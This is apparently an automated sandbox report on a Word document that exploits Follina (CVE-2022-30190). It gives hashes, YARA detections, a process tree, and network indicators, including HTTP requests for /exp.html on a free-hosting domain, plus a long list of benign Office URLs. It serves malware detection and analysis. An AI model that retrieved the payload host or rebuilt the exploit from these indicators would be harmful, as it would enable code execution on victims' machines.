Edit tour

Windows Analysis Report
test_exploit.docx.docx

Overview

General Information

Sample Name:	test_exploit.docx.docx
Analysis ID:	648185
MD5:	fcb4a6f299be7168bea772af871e203e
SHA1:	26428cb21220443643e53c619a98dac6d35acae6
SHA256:	e907ec4b1da6b2fa4e2fcff5b80d8c004f3b8922fcf62a76988a5a16036dcf8f
Tags:	doc
Infos:

Detection

Follina CVE-2022-30190

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Malicious sample detected (through community Yara rule)

Contains an external reference to another file

Queries the volume information (name, serial number etc) of a device

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 6420 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

MSOSYNC.EXE (PID: 6600 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)

splwow64.exe (PID: 3092 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	INDICATOR_OLE_RemoteTemplate	Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents	ditekSHen	0x37a:$olerel: relationships/oleObject 0x393:$target1: Target="http 0x3c9:$mode: TargetMode="External

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\27C32ABB.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\exp[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\exp[1].htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBBF4665.htm	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\27C32ABB.htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\exp[1].htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\exp[1].htm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BBBF4665.htm, type: DROPPED

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 145.14.144.97:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 145.14.144.176:443 -> 192.168.2.3:49740 version: TLS 1.2

Source: global traffic

TCP traffic: 192.168.2.3:49732 -> 145.14.144.97:443

Source: global traffic

DNS query: name: samisoooo.000webhostapp.com

Source: global traffic

TCP traffic: 192.168.2.3:49732 -> 145.14.144.97:443

Source: global traffic	HTTP traffic detected: GET /exp.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: samisoooo.000webhostapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /exp.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: samisoooo.000webhostapp.comConnection: Keep-Alive

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.office.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://augloop.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://cdn.entity.
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://cortana.ai
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://cr.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://directory.services.
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://graph.windows.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://invites.office.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://login.windows.local
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://management.azure.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://management.azure.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://osi.office.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://outlook.office.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 162E0FB2-22FE-47A8-BEDD-0137327DF29A.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
